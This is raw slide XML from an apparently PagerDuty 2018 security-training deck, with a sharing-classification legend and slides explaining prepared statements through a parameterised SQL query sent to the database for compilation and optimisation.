            <a:off x="1051818" y="12544209"/>
            <a:ext cx="22381964" cy="44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000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Prepared_statement</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="661" name="info-white.png" descr="info-white.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="735727" y="12616767"/>
            <a:ext cx="309895" cy="309894"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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85"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86" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188" name="Circle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2400088" y="2350201"/>
            <a:ext cx="1270001" cy="1270001"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="25C151"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="584200">
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:defRPr b="1" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="Circle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2400088" y="8666335"/>
            <a:ext cx="1270001" cy="1270001"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C62818"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="584200">
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:defRPr b="1" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190" name="Circle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2400088" y="5635268"/>
            <a:ext cx="1270001" cy="1270001"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F8991B"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="584200">
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:defRPr b="1" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191" name="PUBLIC"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4005791" y="2532764"/>
            <a:ext cx="2519153"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a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>PUBLIC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192" name="RESTRICTED"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4005791" y="5817830"/>
            <a:ext cx="4212693"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a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>RESTRICTED</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="INTERNAL ONLY"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4005791" y="8848897"/>
            <a:ext cx="5236507"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a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>INTERNAL ONLY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194" name="Slide can be shared publicly with family/friends, Twitter, etc."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4003886" y="3438697"/>
            <a:ext cx="17980026" cy="904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i="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Slide </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:t> be shared publicly with family/friends, Twitter, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195" name="Slide can only be shared with customers under an NDA."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3971183" y="6715297"/>
            <a:ext cx="17980026" cy="904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i="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Slide can only be shared with customers </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng"/>
              <a:t>under an NDA</a:t>
            </a:r>
            <a:r>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="196" name="Slide is not to be shared with anyone outside of PagerDuty."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3947794" y="9817134"/>
            <a:ext cx="17980026" cy="904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i="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Slide is not to be shared with </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng"/>
              <a:t>anyone</a:t>
            </a:r>
            <a:r>
              <a:t> outside of PagerDuty.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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67" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-139700" y="1176337"/>
            <a:ext cx="8281988" cy="1933576"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8281987" cy="1933575"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="665" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="2645"/>
              <a:ext cx="7128934" cy="1928285"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0265C0"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="666" name="Triangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="6737879" y="389466"/>
              <a:ext cx="1933576" cy="11546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0265C0"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="668" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-74483" y="6733190"/>
            <a:ext cx="24532966" cy="1428338"/>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669" name="Prepare"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Prepare</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="670"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67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672" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="673" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="674" name="SELECT * FROM users WHERE username=:name"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4417764" y="6982221"/>
            <a:ext cx="15110024"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5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:t> users </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:t> username=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>:name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="675" name="Template created with unspecified values."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5296886" y="4556228"/>
            <a:ext cx="13790229"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800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Template created with unspecified values.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="676" name="(Also called: parameters, placeholders, bind variables…)"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5747097" y="9348088"/>
            <a:ext cx="12889806"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i="1" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="A7AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>(Also called: parameters, placeholders, bind variables…)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667"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="300" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="667"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="300" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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7" grpId="1"/>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82" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6151033" y="1176337"/>
            <a:ext cx="10754255" cy="1933576"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="10754254" cy="1933575"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="680" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="2645"/>
              <a:ext cx="9601201" cy="1928285"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0265C0"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="681" name="Triangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="9210146" y="389466"/>
              <a:ext cx="1933576" cy="11546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0265C0"/>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="685" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-139700" y="1176337"/>
            <a:ext cx="8281988" cy="1933576"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8281987" cy="1933575"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="683" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="2645"/>
              <a:ext cx="7128934" cy="1928285"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="004380"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="684" name="Triangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="6737879" y="389466"/>
              <a:ext cx="1933576" cy="11546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004380"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="686" name="Prepare         Optimize"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A7AAA9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prepare</a:t>
            </a:r>
            <a:r>
              <a:t>         Optimize</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="687"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688"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689" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="690" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="691" name="Template sent to DBMS."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8143118" y="4556228"/>
            <a:ext cx="8097764"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800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Template sent to DBMS.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="692" name="Compiles and performs query optimization."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5113455" y="9306614"/>
            <a:ext cx="14157090"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800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Compiles and performs query optimization.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="693" name="sql-file.png" descr="sql-file.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4758266" y="6007100"/>
            <a:ext cx="2302934" cy="2302934"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="694" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7784264" y="7158566"/>
            <a:ext cx="8764672" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="101600">
            <a:solidFill>
              <a:srgbClr val="25C151"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="695" name="database.png" descr="database.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="17272000" y="6007100"/>
            <a:ext cx="2302934" cy="2302934"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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682"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="300" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="682"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="300" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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2" grpId="1"/>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701" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15549033" y="1176337"/>
            <a:ext cx="10754255" cy="1933576"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="10754254" cy="1933575"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="699" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="2645"/>
              <a:ext cx="9601201" cy="1928285"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0265C0"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="700" name="Triangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="9210146" y="389466"/>
              <a:ext cx="1933576" cy="11546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3F7CAB"/>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="704" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6151033" y="1176337"/>
            <a:ext cx="10754255" cy="1933576"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="10754254" cy="1933575"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="702" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="2645"/>
              <a:ext cx="9601201" cy="1928285"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="004380"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="703" name="Triangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="9210146" y="389466"/>
